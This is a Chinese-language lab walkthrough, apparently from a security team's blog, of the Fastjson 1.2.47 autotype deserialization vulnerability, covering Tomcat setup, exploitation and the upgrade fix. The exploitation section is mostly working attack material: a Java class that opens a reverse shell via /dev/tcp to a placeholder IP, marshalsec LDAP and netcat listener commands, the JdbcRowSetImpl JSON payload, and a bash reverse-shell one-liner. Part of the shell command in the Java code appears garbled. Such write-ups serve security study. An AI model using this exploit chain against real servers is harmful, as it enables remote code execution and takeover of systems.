| 超详细的Fastjson | 您所在的位置:网站首页 › 关于青春回忆的作文800字 › 超详细的Fastjson |
超详细的Fastjson
|
本文作者:daxi0ng(Timeline Sec新成员) 本文共1946字,阅读大约需要6分钟 0x00 简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 0x01 漏洞概述 首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。 0x02 影响版本 Fastjson1.2.47以及之前的版本 0x03 环境搭建 Tomcat下载链接: https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.27/bin/apache-tomcat-9.0.27.tar.gz方法一:使用docker搭建tomcat 1、拉取官方镜像 docker pull rightctrl/tomcat2、映射到我服务器8080端口 docker run -d --name tomcat -p 8080:8080 rightctrl/tomcat 3、访问http://ip:8080/  4、将fastjson环境安装在tomcat上 文件解压后,直接复制到tomcat的webapps目录下 docker cp fastjson1.2.47 tomcat:/usr/opt/tomcat/webapps/5、进入容器查看是否复制成功 docker exec -i -t tomcat /bin/bash目标是一个web应用,访问返回“Hello world”。正常POST一个json,目标会提取json对象中的name和age拼接成一句话返回。访问http://ip:8080/fastjson1.2.47/  至此docker的fastjson反序列化漏洞环境搭建成功 方法二:本地搭建tomcat 1、下载一个tomcat9 https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.27/bin/apache-tomcat-9.0.27.tar.gz2、将此压缩包复制到我的linux服务器上 tar -zxvf apache-tomcat-9.0.27.tar.gz -C / mv apache-tomcat-9.0.27 tomcat93、授予tomcat9这个文件夹777权限 chmod -R 777 /tomcat94、配置JDK版本及环境变量 export JAVA_HOME=/usr/java/jdk1.8.0_181 export JRE_HOME=/usr/java/jdk1.8.0_181/jre export CLASS_PATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib export PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin export CATALINA_HOME=/tomcat95、应用环境变量 source etc/profile6、启动tomcat 进入tomcat9下的bin目录 ./catalina.sh start 最后复制fastjson1.2.47到webapps文件夹下,环境即搭建成功 0x04 漏洞利用 1、编译生成Exploit.class 首先将以下代码保存为Exploit.java(反弹shell命令在代码内,可自行调整) import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; public class Exploit{ public Exploit() throws Exception { Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5/dev/tcp/xx.xx.xx.xx/1888;cat &5 >&5; done"}); InputStream is = p.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(is)); String line; while((line = reader.readLine()) != null) { System.out.println(line); } p.waitFor(); is.close(); reader.close(); p.destroy(); } public static void main(String[] args) throws Exception { } }然后编译Exploit.java,会生成一个Exploit.class文件 javac Exploit.java将编译生成的Exploit.class文件放至web目录下,即浏览器访问会下载  2、开启三个监听窗口 第一个,使用python搭建一个临时的web服务 python -m SimpleHTTPServer 1111 Ps:此步是为了接收LDAP服务重定向请求,需要在payload的目录下开启此web服务,这样才可以访问到payload文件 第二个,服务器使用marshalsec开启LDAP服务监听: java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:1111/#Exploit 9999 Ps:使用marshalsec工具快捷的开启LDAP服务,借助LDAP服务将LDAP reference result 重定向到web服务器 第三个,nc监听 nc -lvp 1888Ps:这是最终得到shell的窗口 访问fastjson页面Burp发包,改为POST请求,使用EXP { "name":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "x":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://ip:9999/Exploit", "autoCommit":true } } 发送后可以看到第三个窗口成功得到shell  0x05 修复方式 将Fastjson升级到最新版本 https://github.com/alibaba/fastjson 0x06 坑点 1、Docker中,在root用户下将JDK环境变量配置到了/etc/profile中,当时通过source /etc/profile命令使该文件生效,echo $JAVA_HOME时也没有问题,但是重启容器以后就又不生效了 解决:在/root/.bashrc文件中添加一句source /etc/profile(或者将环境变量的配置放到该文件中) 2、在使用LDAP服务反弹shell用的命令不能直接使用 "bash -i >& /dev/tcp/xx.xx.xx.xx/1888 0>&1"3、jdk版本一定要注意! 启动服务之前用 java -version查看自己的jdk版本是否低于以下jdk版本  参考文章: http://www.svenbeast.com/post/c0VE5mjC-/#0x03-%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA https://www.cnblogs.com/moonsoft/p/9264883.html https://www.cnblogs.com/Welk1n/p/11446519.html https://blog.csdn.net/lwcaiCSDN/article/details/87862025 |
【本文地址】